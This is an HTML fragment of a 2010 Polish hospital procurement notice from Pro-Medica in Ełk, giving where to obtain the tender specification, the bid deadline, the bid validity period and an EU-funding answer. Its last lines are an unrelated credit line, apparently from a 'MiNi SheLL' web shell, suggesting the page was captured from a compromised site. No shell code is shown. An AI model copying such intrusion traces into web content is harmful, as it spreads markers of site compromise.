<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.promedica.elk.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Pro-Medica w Ełku Sp. z o. o.;ul. Baranki 24; 19-300 Ełk ;Sekretariat pokój 0/27A      - 1 piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.05.2010 godzina 10:00, miejsce: Pro-Medica w Ełku Sp. z o. o.;ul. Baranki 24; 19-300 Ełk ;Sekretariat pokój 504; V piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com